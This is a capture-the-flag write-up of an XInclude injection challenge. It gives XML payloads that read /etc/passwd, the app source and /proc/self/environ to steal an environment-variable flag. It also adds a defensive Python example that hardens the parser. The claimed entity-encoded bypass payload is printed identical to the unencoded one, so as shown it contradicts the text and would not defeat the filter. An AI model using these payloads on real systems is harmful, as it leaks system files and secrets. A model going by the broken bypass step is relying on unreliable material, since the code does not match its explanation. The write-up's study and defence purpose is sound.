Rating: 5.0

The challenge provides its source code. Reviewing it, we found something interesting: the line `ElementInclude.include(root)`, and a check that the submitted XML must not contain "text". We therefore try using XInclude to read the file "app.py". The payload is:
```
<document xmlns:xi="http://www.w3.org/2001/XInclude">
<attribute>
Copyright (c) <xi:include href="/etc/passwd" parse="text"/>.
</attribute>
</document>
```
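To bypass `if "text" not in xml.lower()`, we use an HTML entity to encode the "text" string: the check runs on the raw input, while the XML parser decodes the entity before `ElementInclude` reads the `parse` attribute. Replacing "text" with its entity-encoded form, we have: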
```
<document xmlns:xi="http://www.w3.org/2001/XInclude">
<attribute>
Copyright (c) <xi:include href="/etc/passwd" parse="text"/>.
</attribute>
</document>
```
Submit the payload and we can read the file.
![/etc/passwd](https://i.ibb.co/9bcGZWL/1.png)
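
Why the string check fails and what a check on the parsed tree looks like, as an added example that is not part of the original writeup or the challenge source. `naive_filter` mirrors the quoted `if` condition; `parsed_parse_attr`, `safe_process`, the `sample.dat` href and the sample document are hypothetical names and constructed input.

```python
import xml.etree.ElementTree as ET

XI_NS = "http://www.w3.org/2001/XInclude"

# Constructed sample input: "text" written as numeric character references,
# with a placeholder href. Nothing in this example opens a file.
ENCODED = "".join(f"&#{ord(c)};" for c in "text")
SAMPLE = (
    f'<document xmlns:xi="{XI_NS}"><attribute>'
    f'<xi:include href="sample.dat" parse="{ENCODED}"/>'
    "</attribute></document>"
)


def naive_filter(xml: str) -> bool:
    """The check quoted in the writeup: inspects the raw, undecoded string."""
    return "text" not in xml.lower()


def parsed_parse_attr(xml: str):
    """Return the parse attribute as the parser hands it to ElementInclude."""
    root = ET.fromstring(xml)
    node = root.find(f".//{{{XI_NS}}}include")
    return None if node is None else node.get("parse")


def safe_process(xml: str) -> ET.Element:
    """Hardened variant (assumption: uploads never need XInclude).

    The decision is made on the parsed tree, so any encoding of attribute
    values is already resolved; every element in the XInclude namespace is
    refused and ElementInclude.include() is never called.
    """
    root = ET.fromstring(xml)
    for el in root.iter():
        if isinstance(el.tag, str) and el.tag.startswith("{" + XI_NS + "}"):
            raise ValueError("XInclude elements are not allowed in uploads")
    return root


if __name__ == "__main__":
    print("raw-string filter passes:", naive_filter(SAMPLE))
    print("parse attribute after parsing:", parsed_parse_attr(SAMPLE))
    try:
        safe_process(SAMPLE)
    except ValueError as exc:
        print("hardened check:", exc)
```

If the application does need includes, passing a custom `loader` to `ElementInclude.include` that only resolves an allowlisted set of paths is the narrower alternative to rejecting the namespace outright.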

-----

Change "/etc/passwd" to "app.py" and we learn that the flag is in an environment variable.
![app.py](https://i.ibb.co/vjtMkF6/1.png)

-----

To get the flag we must read the file "/proc/self/environ"; modify the payload a bit, and...
![FLAG](https://i.ibb.co/rF2XGqH/1.png)

pham, Feb. 14, 2022, 5:47 a.m.

good job